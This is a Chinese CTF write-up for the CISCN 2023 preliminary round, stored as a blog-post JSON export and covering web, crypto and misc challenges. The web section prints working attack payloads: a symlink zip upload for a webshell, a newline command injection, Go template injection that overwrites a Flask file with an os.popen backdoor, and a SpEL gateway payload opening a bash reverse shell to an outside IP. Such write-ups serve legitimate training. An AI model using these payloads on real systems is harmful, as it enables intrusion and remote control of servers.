{"id":1852,"date":"2023-05-28T22:57:39","date_gmt":"2023-05-28T14:57:39","guid":{"rendered":"https:\/\/fushuling.com\/?p=1852"},"modified":"2023-07-31T14:41:22","modified_gmt":"2023-07-31T06:41:22","slug":"ciscn%e5%88%9d%e8%b5%9b-by-notenougheffort","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/05\/28\/ciscn%e5%88%9d%e8%b5%9b-by-notenougheffort\/","title":{"rendered":"CISCN\u521d\u8d5b by NotEnoughEffort"},"content":{"rendered":"\n

\u7b2c\u4e00\u5929\u5168\u56fd\u5341\u56db\u540d\uff0c\u529b\u538b\u4e09\u53f6\u8349\u62ff\u4e86\u897f\u5357\u7b2c\u4e00\uff0c\u7b2c\u4e8c\u5929\u5c31\u88ab\u9152\u5427\u821e\u7237\u7237\u548c\u4e09\u53f6\u8349\u7237\u7237\u5e72\u7206\u4e86\uff0c\u6700\u540e\u897f\u5357\u7b2c\u516d\uff0c\u91cd\u5e86\u7b2c\u4e00\uff0c\u8fd8\u884c(\u7b2c\u4e8c\u5929\u7684misc\u548ccrypto\u592a\u62bd\u8c61\u4e86\uff0c\u76f4\u63a5\u7ed9\u6211\u5e72\u788e\u4e86)\u3002<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

Web<\/h1>\n\n\n\n

unzip<\/h2>\n\n\n\n
<?php\nerror_reporting(0);\nhighlight_file(__FILE__);\n\n$finfo = finfo_open(FILEINFO_MIME_TYPE);\nif (finfo_file($finfo, $_FILES[\"file\"][\"tmp_name\"]) === 'application\/zip'){\n    exec('cd \/tmp && unzip -o ' . $_FILES[\"file\"][\"tmp_name\"]);\n}; <\/code><\/pre>\n\n\n\n
https:\/\/blog.csdn.net\/justruofeng\/article\/details\/122108924<\/a> \u539f\u9898<\/p>\n\n\n\n
\u5148\u521b\u5efa\u8f6f\u8fde\u63a5\uff0c\u6307\u5411 \/var\/www\/html<\/code><\/p>\n\n\n\n
ln -s \/var\/www\/html feng\nzip -y feng1.zip feng<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728feng\u76ee\u5f55\u4e0b\u9762\u5199\u4e2a\u9a6c\uff0c\u7136\u540e\u518d\u628a\u8fd9\u4e2afeng\u76ee\u5f55\u4e0d\u5e26-y<\/code>\u7684\u538b\u7f29\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540e\u5148\u4e0a\u4f20feng1.zip\uff0c\u518d\u4e0a\u4f20feng2.zip\uff0c\u5373\u53ef\u628a\u6728\u9a6c\u89e3\u538b\u81f3\u7f51\u7ad9\u76ee\u5f55<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
dumpit<\/h2>\n\n\n\n
\u975e\u9884\u671f\uff0cflag\u5c31\u5728env\u91cc\uff0c\u7528%0a\u7ed5\u4e00\u4e0brce\u5199env\u5c31\u884c\u4e86<\/p>\n\n\n\n
?db=ctf&table_2_dump=%0Aenv<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u4e3a\u4ec0\u4e48\u80fd\u8fd9\u6837\u6253\u901a\u5462\uff0c\u4e2a\u4eba\u611f\u89c9\u8fd9\u91cc\u4e0d\u662f\u6267\u884c\u7684sql\u8bed\u53e5\uff0c\u800c\u662f\u7a0b\u5e8f\u547d\u4ee4\uff0c\u56e0\u4e3a\u6211\u4eec\u770b\u7684\u90a3\u4e2a\u65e5\u5fd7\u529f\u80fd\u5176\u5b9e\u4e0d\u662f\u65e5\u5fd7\uff0c\u800c\u662fmysqldump\u8fd9\u4e2a\u5de5\u5177\u7528\u6765\u5907\u4efd\u6570\u636e\u5e93\u7684\uff0c\u6240\u4ee5\u8fd9\u91cc\u5e94\u8be5\u76f4\u63a5\u6267\u884c\u7684\u7a0b\u5e8f\u547d\u4ee4\uff0c\u6240\u4ee5\u80fd\u6362\u884c\u7b26RCE\u3002<\/p>\n\n\n\n
go-session<\/h2>\n\n\n\n
\u6ca1\u505a\u51fa\u6765\uff0c\u770b\u7684\u522b\u4eba\u7684wp<\/p>\n\n\n\n
package main\nimport (\n \"net\/http\"\n \"github.com\/gin-gonic\/gin\"\n \"github.com\/gorilla\/sessions\"\n)\nfunc main() {\n var store = sessions.NewCookieStore([]byte(\"\"))\n r := gin.Default()\n r.GET(\"\/\", func(c *gin.Context) {\n session, err := store.Get(c.Request, \"session-name\")\n if err != nil {\n http.Error(c.Writer, err.Error(), http.StatusInternalServerError)\n return\n }\n session.Values[\"name\"] = \"admin\"\n err = session.Save(c.Request, c.Writer)\n if err != nil {\n http.Error(c.Writer, err.Error(), http.StatusInternalServerError)\n return\n }\n c.String(200, \"Hello, guest\")\n })\n r.Run()\n}<\/code><\/pre>\n\n\n\n
\u6e90\u7801\u90a3\u91ccSESSION_KEY\u662f\u7a7a\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7b7e\u4e00\u4e2aadmin\u7684cookie<\/p>\n\n\n\n
session\u0002name=MTY4NTE2NjM0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkc1aGJXVUdjM1J5YVc1bkRBY0FCV0ZrYldsdXwOKxem4pxrKun4XeKg9xm11WhWHL1uae0s725nzr61aA==<\/code><\/pre>\n\n\n\n
\u7136\u540e\u8bbf\u95eehttp:\/\/39.105.26.155:37461\/flask?name=\/ \uff0c\u770b\u5230 Debug\u6ca1\u5173(\u56e0\u6b64\u5f88\u591a\u8001\u54e5\u90fd\u7b97pin\u53bb\u4e86\uff0c\u54c8\u54c8)\uff0c\u62a5\u9519\u4fe1\u606f\u4e2d\u6709\u2f42\u4ef6\u8def\u5f84\uff1a\/app\/server.py\u3002<\/p>\n\n\n\n
\u7136\u540e\u8fd9\u91cc\u6211\u4eec\u8981\u4f7f\u7528go\u91cc\u7684ssti(\u7b2c\u4e00\u6b21\u89c1)<\/p>\n\n\n\n
\n
<\/p>\n\u4f7f\u2f64 include \u6a21\u677f\u6a21\u677f\u8bed\u6cd5\u8bfb\u2f42\u4ef6\uff0c\u56e0\u4e3a\u4f1a\u5b9e\u4f53\u5316 HTML \u5b57\u7b26\uff0c\u5b57\u7b26\u4e32\u5f15\u53f7\u4f1a\u88ab\u8f6c\u4e49\u2f46\u6cd5\u4f7f\u2f64\u3002\u53d1\u73b0 Gin
Context \u88ab\u6ce8\u2f0a\u8fdb\u4e86\u6a21\u677f\u4e2d\uff0c\u53ef\u4ee5\u4f7f\u2f64 c.GetHeader \u4ece\u8bf7\u6c42\u5934\u4e2d\u8bfb\u53d6\uff0cKey \u4ece c.ClientIP() \u4e2d\u8bfb\u53d6\uff0c\u2f00
\u5f00\u59cb\u53ef\u4ee5\u5148\u8f93\u51fa\u4e0b {{c.ClientIP()}} \uff0c\u6bcf\u6b21\u5f00\u542f\u9776\u673a\u540e\u90fd\u4e0d\u2f00\u6837\uff0c\u8fd9\u6b21\u662f 10.0.0.1 \u3002
\u6240\u4ee5\uff0c\u8bbe\u7f6e\u8bf7\u6c42\u5934 10.0.0.1=\/app\/server.py \uff0c\u8bf7\u6c42 URL\uff0c\u8bfb\u53d6 server.py \u2f42\u4ef6\uff1a<\/cite><\/blockquote>\n\n\n\n
http:\/\/39.105.26.155:37461\/admin?name=%7B%25 include c.GetHeader(c.ClientIP())\n%25%7D<\/code><\/pre>\n\n\n\n
from flask import Flask,requesfrom flask import Flask,request\napp = Flask(__name__)\n@app.route('\/')\ndef index():\n  name = request.args['name']\n  return name + \" no ssti\"\nif __name__== \"__main__\":\n  app.run(host=\"127.0.0.1\",port=5000,debug=True)a<\/code><\/pre>\n\n\n\n
\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u4f7f\u2f64Gin Context\u91cc\u7684 FormFile\u6765\u8bfb\u53d6\u8868\u5355\u2f42\u4ef6\uff0c SaveUploadFile \u6765\u5b9e\u73b0\u2f42\u4ef6\u4e0a\u4f20\uff0c\u4ece\u800c\u4fee\u6539\u8986\u76d6 \/app\/server.py \u2f42\u4ef6\u5185\u5bb9\u3002\u53c8\u56e0\u4e3aFlask \u5f00\u542f\u4e86debug\u6240\u4ee5\u68c0\u6d4b\u5230\u2f42\u4ef6\u53d8\u52a8\u540e\u4f1a\u2f83\u52a8\u91cd\u542f\u670d\u52a1\u5668\uff0c\u6240\u4ee5\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n\n\n
\u4fee\u6539\u540e\u7684app.py\u6587\u4ef6\uff1a<\/p>\n\n\n\n
from flask import Flask,request\napp = Flask(__name__)\nimport os\nos.system('ls \/ > \/tmp\/output')\n\n@app.route('\/')\ndef index():\n    name = request.args['name']\n    return name + \" no ssti\"\n\nif __name__== \"__main__\":\n    app.run(host=\"127.0.0.1\",port=5000,debug=True)<\/code><\/pre>\n\n\n\n
GET \u8bf7\u6c42 URL\uff1a<\/p>\n\n\n\n
\u8bbe\u7f6e Header\uff1a 10.0.0.1=\/app\/server.py\nBody\uff1a 10.0.0.1=<\u9009\u62e9\u672c\u5730 server.py \u2f42\u4ef6><\/code><\/pre>\n\n\n\n
http://39.105.26.155:37461\/admin?name=%7B%7Bc.SaveUploadedFile(c.FormFile(c.ClientIP()),c.GetHeader(c.ClientIP()))%7D%7D<\/code><\/pre>\n\n\n\n
\u7136\u540e\u8bfb\u53d6\/tmp\/output\u53ef\u4ee5\u770b\u5230flag\u6587\u4ef6\u540d\uff0c\u518d\u8bfb\u4e00\u6b21flag\u5373\u53ef<\/p>\n\n\n\n
ctfshow\u4e0a\u6709\u590d\u73b0\u73af\u5883\u4e86\uff0c\u8865\u4e00\u4e0b\u590d\u73b0<\/p>\n\n\n\n
\u628a\u4ee3\u7801\u6dfb\u52a0\u5230route\u91cc\uff0c\u8bbf\u95ee\u540e\u83b7\u5f97admin\u7684cookie\uff1a<\/p>\n\n\n\n
func Key(c *gin.Context) {\n\tsession, _ := store.Get(c.Request, \"session-name\")\n\tsession.Values[\"name\"] = \"admin\"\n\tsession.Save(c.Request, c.Writer)\n\tc.String(200, \"Hello, guest\")\n}<\/code><\/pre>\n\n\n\n
MTY4NTE2OTE4MHxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkc1aGJXVUdjM1J5YVc1bkRBY0FCV0ZrYldsdXzUn0khtUAglbEqre0c-3PmfQg0snOpUCSYyvq07U4AKw==<\/code><\/pre>\n\n\n\n
\u7136\u540e\u5728\/admin\u8fdb\u884cssti\uff0c\u4e0a\u4f20\u6587\u4ef6\u8986\u76d6app.py<\/p>\n\n\n\n
\/admin?name={%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form)%}{{c.SaveUploadedFile(file,path)}}&m=file&n=\/app\/server.py<\/code><\/pre>\n\n\n\n
GET \/admin?name=%7B%25set%20form%3Dc.Query(c.HandlerName%7Cfirst)%25%7D%7B%25set%20path%3Dc.Query(c.HandlerName%7Clast)%25%7D%7B%25set%20file%3Dc.FormFile(form)%25%7D%7B%7Bc.SaveUploadedFile(file%2Cpath)%7D%7D&m=file&n=\/app\/server.py HTTP\/1.1\r\nHost: b7e3cbc4-b806-4c0d-b87d-b6d9784f1abe.challenge.ctf.show\r\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryqwT9VdDXSgZPm0yn\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/113.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: _ga=GA1.2.178448525.1671190440; session-name=MTY4NTE2OTE4MHxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkc1aGJXVUdjM1J5YVc1bkRBY0FCV0ZrYldsdXzUn0khtUAglbEqre0c-3PmfQg0snOpUCSYyvq07U4AKw==\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 558\r\n\r\n------WebKitFormBoundaryqwT9VdDXSgZPm0yn\r\nContent-Disposition: form-data; name=\"file\"; filename=\"server.py\"\r\nContent-Type: image\/jpeg\r\n\r\nfrom flask import Flask, request\r\nimport os\r\napp = Flask(__name__)\r\n\r\n@app.route('\/')\r\ndef index():\r\n    name = request.args['name']\r\n    res = os.popen(name).read()\r\n    return res + \" no ssti\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(host=\"127.0.0.1\", port=5000, debug=True)\r\n\r\n------WebKitFormBoundaryqwT9VdDXSgZPm0yn\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\u00d0\u00a4\r\n------WebKitFormBoundaryqwT9VdDXSgZPm0yn--<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5199\u4e86\u9a6c\u4e4b\u540e\u76f4\u63a5\u62ffflag\u5373\u53ef<\/p>\n\n\n\n
\/flask?name=?name=cat${IFS}\/t*<\/code><\/pre>\n\n\n\n
BackendService<\/h2>\n\n\n\n
\u57fa\u672c\u4e0a\u4e00\u6837\u7684 https:\/\/xz.aliyun.com\/t\/11493<\/p>\n\n\n\n
\u5148\u6253\u4e00\u4e2aCVE-2021-29441\u8ba4\u8bc1\u7ed5\u8fc7\u6dfb\u52a0\u8d26\u6237<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540e\u6dfb\u52a0\u914d\u7f6e\uff08jar\u5305\u91cc\u914d\u7f6eData Id\u5fc5\u987b\u53ebbackcfg\uff09<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
{\n    \"spring\":{\n        \"cloud\":{\n            \"gateway\":{\n                \"routes\":[\n                    {\n                        \"id\":\"exam\",\n                        \"order\":0,\n                        \"uri\":\"lb:\/\/backendservice\",\n                        \"predicates:\":[\n                            \"Path=\/test\/**\"\n                        ],\n                        \"filters\":[\n                            {\n                                \"name\":\"RewritePath\",\n                                \"args\":{\n                                    \"replacement\":\"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'bash','-c','bash -i >& \/dev\/tcp\/43.153.175.155\/9383 0>&1'}).getInputStream())).replaceAll('\\n','').replaceAll('\\r','')}\"\n                                }\n                            }\n                        ]\n                    }\n                ]\n            }\n        }\n    }\n}\n<\/code><\/pre>\n\n\n\n
\u7136\u540e\u53cd\u5f39shell\u5373\u53ef<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Crypto<\/h1>\n\n\n\n
SM2\u7b97\u6cd5<\/strong><\/h2>\n\n\n\n
\u5148\u81ea\u5df1\u751f\u6210sm2\u7684\u516c\u94a5\u4e0e\u79c1\u94a5\uff0c\u7528\u79c1\u94a5\u89e3\u5bc6randomString\u5f97\u5230\u968f\u673a\u6570\uff0c\u4e5f\u5c31\u662fsm4\u7684\u5bc6\u94a5\uff1a<\/p>\n\n\n\n
\u968f\u673a\u6570\uff1aCF D6 E0 6B BC B1 81 01 E1 0A 48 CB E3 A7 20 3B <\/code><\/pre>\n\n\n\n
\u7136\u540e\u7528sm4\u7684\u5bc6\u94a5\u5bf9privateKey\u8fdb\u884c\u89e3\u5bc6\uff0c\u5f97\u5230\u670d\u52a1\u5668\u7684sm2\u7684\u5bc6\u94a5<\/p>\n\n\n\n
\u670d\u52a1\u5668\u79c1\u94a5\uff1a44 45 95 C7 4A 1F 30 F1 CA 41 5A 45 31 A9 ED 6E 96 80 26 B3 00 53 F9 13 4D 9A CD 21 05 A1 99 DD <\/code><\/pre>\n\n\n\n
\u6700\u540e\u518d\u7528\u8be5\u5bc6\u94a5\u5bf9quantumString\u8fdb\u884csm2\u89e3\u5bc6\u5373\u53ef<\/p>\n\n\n\n
\u660e\u6587\uff1a69 29 BA DE 63 01 FA 02 88 7D CB 9B 39 74 FD 00 <\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4fe1\u5ea6\u91cf<\/strong><\/h2>\n\n\n\n
flag\u5c31\u5728\u73af\u5883\u53d8\u91cf\u91cc<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Sign_in_passwd<\/strong><\/h2>\n\n\n\n
\u6362\u8868base64\uff0c\u4e0b\u9762\u7684\u5b57\u7b26\u4e32url\u89e3\u7801\u540e\u5c31\u662f\u8868<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
MISC<\/h1>\n\n\n\n
\u7b7e\u5230<\/strong><\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u88ab\u52a0\u5bc6\u7684\u751f\u4ea7\u6d41\u91cf<\/strong><\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
MMYWMX3GNEYWOXZRGAYDA===<\/code><\/pre>\n\n\n\n
base32\u89e3\u7801\u5f97\u5230c1f_fi1g_1000 ,\u8865\u4e0aflag{}\u5f97\u5230flag{c1f_fi1g_1000}<\/p>\n\n\n\n
\u56fd\u7cb9<\/h2>\n\n\n\n
a.png\u5f53\u4f5cx\u5750\u6807\uff0ck.png\u5f53\u4f5cy\u5750\u6807\uff0c\u9898\u76ee.png\u91cc\u7684\u9ebb\u5c06\u7684\u6392\u5e8f\u5f53\u4f5c\u5bf9\u5e94\u82b1\u8272\u7684\u503c\uff0c\u6bd4\u5982\u4e00\u4e07\u662f\u7b2c\u4e00\u4e2a\u90a3\u5c31\u662f\u4e00\uff0c\u7136\u540e\u63d0\u53d6\u5750\u6807\u753b\u56fe<\/p>\n\n\n\n
import matplotlib.pyplot as plt\n\ndata = [(1,4),(1,5),(1,10),(1,30),(2,3),(2,4),(2,5),(2,6),(2,10),(2,29),(2,30),(3,3),(3,4),(3,10),(3,16),(3,17),(3,22),(3,23),(3,24),(3,25),(3,29),(3,30),(4,2),(4,3),(4,4),(4,5),(4,10),(4,15),(4,16),(4,18),(4,21),(4,22),(4,24),(4,25),(4,29),(4,30),(5,3),(5,4),(5,10),(5,15),(5,17),(5,18),(5,19),(5,21),(5,22),(5,25),(5,28),(5,29),(6,3),(6,4),(6,10),(6,15),(6,16),(6,18),(6,19),(6,21),(6,22),(6,25),(6,29),(7,3),(7,4),(7,10),(7,11),(7,12),(7,13),(7,15),(7,18),(7,19),(7,22),(7,23),(7,24),(7,25),(7,29),(7,30),(8,3),(8,4),(8,11),(8,12),(8,15),(8,16),(8,17),(8,18),(8,19),(8,20),(8,25),(8,29),(8,30),(9,21),(9,22),(9,24),(9,25),(9,30),(9,31),(10,23),(10,24),(12,22),(12,23),(12,24),(12,25),(13,2),(13,3),(13,4),(13,5),(13,9),(13,10),(13,11),(13,12),(13,16),(13,17),(13,18),(13,19),(13,24),(13,25),(14,2),(14,5),(14,6),(14,9),(14,12),(14,19),(14,23),(14,24),(15,5),(15,9),(15,12),(15,18),(15,19),(15,22),(15,23),(16,4),(16,5),(16,9),(16,12),(16,17),(16,18),(16,23),(16,24),(17,3),(17,4),(17,9),(17,12),(17,16),(17,17),(17,24),(17,25),(18,3),(18,9),(18,12),(18,16),(18,25),(19,3),(19,4),(19,5),(19,6),(19,9),(19,10),(19,11),(19,12),(19,16),(19,17),(19,18),(19,19),(19,21),(19,22),(19,23),(19,24),(19,25),(20,10),(20,11),(22,3),(22,4),(22,5),(22,6),(22,10),(22,11),(22,12),(22,17),(22,18),(22,19),(22,24),(22,25),(23,3),(23,6),(23,7),(23,9),(23,10),(23,16),(23,17),(23,19),(23,20),(23,22),(23,23),(23,24),(23,25),(24,3),(24,6),(24,7),(24,9),(24,10),(24,16),(24,19),(24,20),(24,24),(24,25),(25,3),(25,6),(25,7),(25,10),(25,11),(25,12),(25,16),(25,19),(25,20),(25,24),(25,25),(26,3),(26,6),(26,7),(26,12),(26,13),(26,16),(26,19),(26,20),(26,24),(26,25),(27,3),(27,6),(27,7),(27,9),(27,12),(27,13),(27,16),(27,19),(27,20),(27,24),(27,25),(28,3),(28,4),(28,6),(28,9),(28,10),(28,11),(28,12),(28,16),(28,17),(28,19),(28,20),(28,24),(28,25),(29,4),(29,5),(29,17),(29,18),(29,19),(31,10),(31,11),(31,12),(31,13),(31,25),(31,31),(32,4),(32,5),(32,6),(32,10),(32,11),(32,12),(32,13),(32,17),(32,18),(32,19),(32,23),(32,24),(32,25),(32,26),(32,32),(33,3),(33,4),(33,6),(33,7),(33,12),(33,16),(33,17),(33,23),(33,24),(33,26),(33,32),(34,6),(34,7),(34,11),(34,16),(34,17),(34,23),(34,24),(34,26),(34,32),(35,6),(35,11),(35,12),(35,17),(35,18),(35,19),(35,23),(35,24),(35,25),(35,26),(35,33),(36,5),(36,12),(36,13),(36,19),(36,20),(36,26),(36,32),(37,4),(37,5),(37,13),(37,16),(37,19),(37,20),(37,25),(37,26),(37,32),(38,4),(38,5),(38,6),(38,7),(38,9),(38,10),(38,11),(38,12),(38,13),(38,16),(38,17),(38,18),(38,19),(38,24),(38,25),(38,31),(38,32),(39,23),(39,24),(39,31)\n]\n\n# \u5c06 x \u548c y \u5206\u522b\u53d6\u51fa\nx_data = [d[0] for d in data]\ny_data = [d[1] for d in data]\n\n# \u7ed8\u5236\u6563\u70b9\u56fe\nplt.scatter(x_data, y_data)\n\n# \u6dfb\u52a0\u6807\u9898\u548c\u5750\u6807\u8f74\u6807\u7b7e\nplt.title(\"A simple scatter plot\")\nplt.xlabel(\"X-axis label\")\nplt.ylabel(\"Y-axis label\")\n\n# \u663e\u793a\u56fe\u5f62\nplt.show()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{202305012359}<\/code><\/pre>\n\n\n\n
\u6211\u5f53\u65f6\u662f\u8089\u773c\u63d0\u53d6\u7684\u3002\u3002\u3002\u5176\u5b9e\u53ef\u4ee5\u7528cv\u5e93\u81ea\u52a8\u8bc6\u522b(\u8bb0\u5f97\u628a\u9898\u76ee.png\u6539\u540d\u6210table.png\uff0c\u4e0d\u7136\u6ca1\u6cd5\u8dd1)\uff1a<\/p>\n\n\n\n
import cv2\nimport numpy as np\n\n\nimg = cv2.imread(\".\/table.png\")\nimg = img[73:, 53:]\n\nrow, col = img.shape[:2]\ntables = [img[:, i:i+53] for i in range(0, col, 53)]\n\nrow_img, col_img = cv2.imread(\".\/a.png\"), cv2.imread(\".\/k.png\")\nrows, cols = row_img.shape[:2]\n\nnew_img = np.zeros((45, 45), dtype=np.uint8)\nfor x in range(0, cols, 53):\n    row_split_img = row_img[:, x:x+53]\n    col_split_img = col_img[:, x:x+53]\n\n    x_pos = [i for i, arr in enumerate(tables) if np.all(arr == row_split_img)][0] + 1\n    y_pos = [i for i, arr in enumerate(tables) if np.all(arr == col_split_img)][0] + 1\n    new_img[x_pos, y_pos] = 255\n\nnew_img = cv2.resize(new_img, None, None, fx=15, fy=15, interpolation=cv2.INTER_AREA)\ncv2.imshow(\"flag.png\", new_img)\ncv2.waitKey(0)\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Pyshell<\/h2>\n\n\n\n
\u6839\u636epython\u6587\u6863 _\u5728python shell\u91cc\u4fdd\u5b58\u4e86\u4e0a\u4e00\u6b21\u6c42\u503c\u7684\u7ed3\u679c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7_+”__”\u83b7\u53d6\u4e00\u4e2a\u5b57\u7b26\u4e32\u53d8\u91cf \u53ef\u4ee5\u4e0d\u65ad\u62fc\u63a5\u7ed5\u8fc77\u4e2a\u5b57\u7b26\u7684\u9650\u5236<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6700\u540eeval(_)\u8bfb\u5230flag<\/p>\n\n\n\n
puzzle<\/h2>\n\n\n\n
\u6ca1\u505a\u51fa\u6765\uff0c\u8d5b\u540eB\u795e\u5168\u7a0b\u6307\u5bfc\uff0c\u8dea\u4e86<\/p>\n\n\n\n
\u4e00\u4e07\u4e2a\u4f60\u53ef\u80fd\u4e0d\u77e5\u9053\u7684\u4f4e\u80fdmisc\u77e5\u8bc6\u4e4b\u2014\u2014bmp\u56fe\u7247\u5bf9\u5e94\u7684\u5750\u6807\u5728bmp\u7684\u524d\u9762\u7684\u5197\u4f59\u4f4d<\/strong>\u91cc\u9762<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6240\u4ee5\u53ef\u4ee5\u6309\u7167\u8fd9\u4e2a\u89c4\u5219\u76f4\u63a5\u5199\u811a\u672c\u62fc\u56fe\uff1a(B\u795e\u7684\u811a\u672c)\uff08\u6ce8\u610f\uff0c\u6709\u4e9b\u56fe\u7247\u662f\u7ffb\u8f6c\u8fc7\u7684\uff0c\u56e0\u6b64\u7528\u9057\u4f20\u7b97\u6cd5\u662f\u8dd1\u4e0d\u51fa\u6765\u7684\uff0c\u4f60\u9700\u8981\u624b\u52a8\u5224\u65ad\u56fe\u7247\u662f\u5426\u7ffb\u8f6c\uff0c\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u4e0b\u4e00\u9053\u9898\u6211\u4eec\u8981\u7528\u8d1f\u9ad8\u5ea6\u548c\u6b63\u9ad8\u5ea6\u8868\u793a01\u7136\u540e\u8f6cbinary\uff09<\/p>\n\n\n\n
import os\nfrom PIL import Image\n\nnew_img = Image.new(\"RGB\", (7200, 4000))\n\nif not os.path.exists(\"out\"):\n    os.makedirs(\"out\", exist_ok=True)\n\nfor root, dirs, files in os.walk(\".\/tmp4\"):\n    for file in files:\n        imgPath = os.path.join(root, file)\n        with open(imgPath, \"rb\") as f:\n            data = f.read()\n            \n        with open(os.path.join(\"out\", f\"{file}\"), \"wb\") as f:\n            f.write(data[:0x16] + (100).to_bytes(4, byteorder=\"little\", signed=False) + data[0x16+4:])\n\nfor root, dirs, files in os.walk(\".\/out\"):\n    for file in files:\n        imgPath = os.path.join(root, file)\n        img = Image.open(imgPath)\n        \n        with open(imgPath, \"rb\") as f:\n            data = f.read(10)\n        x = int.from_bytes(data[6:8], byteorder=\"little\", signed=False)\n        y = int.from_bytes(data[8:], byteorder=\"little\", signed=False)\n        new_img.paste(img, (x, y))\n    \nnew_img.save(\"part1.png\")\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0d\u8fc7\u8fd9\u4e0d\u662f\u7ed3\u675f\uff0c\u53ea\u662f\u8fd9\u9053\u9898\u7684\u5f00\u59cb\uff0c\u8fd9\u9053\u9898flag\u88ab\u5206\u6210\u4e86\u4e09\u90e8\u5206<\/p>\n\n\n\n
\u5ad6\u5f20B\u795e\u7684\u56fe\uff0c\u6211\u672c\u5730\u7684zsteg\u597d\u50cf\u6709\u95ee\u9898\u6ca1\u8dd1\u51fa\u6765<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7b2c\u4e8c\u90e8\u5206\uff0c\u9ad8\u5ea6-100\u7684\u505a0,100\u7684\u505a1\uff0cbinary\u4e4b\u540e\u5f97\u5230(B\u795e\u7684\u811a\u672c)<\/p>\n\n\n\n
import os\nimport libnum\nfrom PIL import Image\n\n# 7200, 4000\ndic = {i: [] for i in range(4000 \/\/ 100)}\n\nfor root, dirs, files in os.walk(\".\/tmp4\"):\n    for file in files:\n        imgPath = os.path.join(root, file)\n        img = Image.open(imgPath)\n        \n        with open(imgPath, \"rb\") as f:\n            data = f.read(0x16+4)\n        x = int.from_bytes(data[6:8], byteorder=\"little\", signed=False)\n        y = int.from_bytes(data[8:10], byteorder=\"little\", signed=False)\n        height = 0 if int.from_bytes(data[0x16:0x16+4], byteorder=\"little\", signed=True) == -100 else 1\n\n        dic[y\/\/100].append([x, height])\n\nbin_str = \"\"\nfor key, values in dic.items():\n    values = sorted(values, key=lambda x: x[0])\n    for value in values:\n        bin_str += f\"{value[-1]}\"\n\n# print(bin_str)\nprint(libnum.b2s(bin_str))\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7b2c\u4e09\u90e8\u5206\uff0cpadding\u6570\u636e\u6309\u7167\u5de6\u4e0a\u5230\u53f3\u4e0b\u7684\u987a\u5e8f\u62fc\u63a5\u5f97\u5230jpg\u56fe\u7247(B\u795e\u7684\u811a\u672c)<\/p>\n\n\n\n
